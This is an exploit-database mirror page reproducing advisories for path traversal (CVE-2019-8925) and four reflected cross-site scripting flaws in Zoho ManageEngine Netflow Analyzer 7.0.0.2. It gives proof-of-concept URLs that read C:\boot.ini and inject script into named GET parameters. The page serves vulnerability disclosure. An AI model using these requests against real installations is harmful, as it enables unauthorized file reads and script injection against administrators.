Menu

Improved exploit search engine. Try it out

"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting"

Author

"Rafael Pedrero"

Platform

jsp

Release date

2019-02-19

Release Date Title Type Platform Author
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-02-19 "Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting" webapps jsp "Rafael Pedrero"
2019-02-18 "Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload" webapps jsp "Dao Duy Hung"
2018-10-30 "Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal" webapps jsp "Rafael Pedrero"
2018-04-16 "Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference" webapps jsp Frogy
2018-02-22 "Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities" webapps jsp "Core Security"
2017-10-09 "Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)" webapps jsp intx0x80
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-08-18 "Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution" webapps jsp "Philip Pettersson"
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration" webapps jsp LiquidWorm
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2017-07-19 "Oracle E-Business Suite 12.x - Server-Side Request Forgery" webapps jsp "Sarath Nair"
2017-04-25 "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection" webapps jsp ERPScan
2017-03-27 "Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)" webapps jsp Sysdream
2017-05-24 "NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion" webapps jsp f3ci
2018-01-05 "Gespage 7.4.8 - SQL Injection" webapps jsp Sysdream
2017-03-10 "Kinsey Infor/Lawson / ESBUS - SQL Injection" webapps jsp "Michael Benich"
2017-02-23 "NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection" webapps jsp MrChaZ
2017-01-04 "Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting" webapps jsp "Jodson Santos"
2018-01-15 "Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect" webapps jsp "Andrew Gill"
2016-08-31 "ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Directory Traversal" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)" webapps jsp LiquidWorm
Release Date Title Type Platform Author
2019-02-19 "Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting" webapps jsp "Rafael Pedrero"
2019-02-19 "XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting" webapps php "Rafael Pedrero"
2019-02-04 "TaskInfo 8.2.0.280 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-02-04 "SpotAuditor 3.6.7 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-02-04 "River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-02-01 "Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "LanHelper 1.74 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "ASPRunner Professional 6.0.766 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "AMAC Address Change 5.4 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-01-30 "Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-30 "IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-30 "Advanced File Manager 3.4.1 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2018-12-21 "SQLScan 1.0 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2018-12-18 "MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow" remote windows "Rafael Pedrero"
2018-11-14 "Advanced Comment System 1.0 - SQL Injection" webapps php "Rafael Pedrero"
2018-10-30 "Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal" webapps jsp "Rafael Pedrero"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46425/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46425/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46425/40885/zoho-manageengine-netflow-analyzer-professional-7002-path-traversal-cross-site-scripting/download/", "exploit_id": "46425", "exploit_description": "\"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting\"", "exploit_date": "2019-02-19", "exploit_author": "\"Rafael Pedrero\"", "exploit_type": "webapps", "exploit_platform": "jsp", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
<!--
# Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8925
# Category: webapps
 
1. Description
   
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value.
 
   
2. Proof of Concept

Original request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf
 
http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini

3. Solution:
   
The product is discontinued. Update to last version this product.

-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8926
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Parameters: bussAlert, customDev and selSource


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8927
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=

Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8928
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest

Parameters: authMeth, passWord, pwd1 and userName


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8929
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype.
   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad

Parameters: param and rtype


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->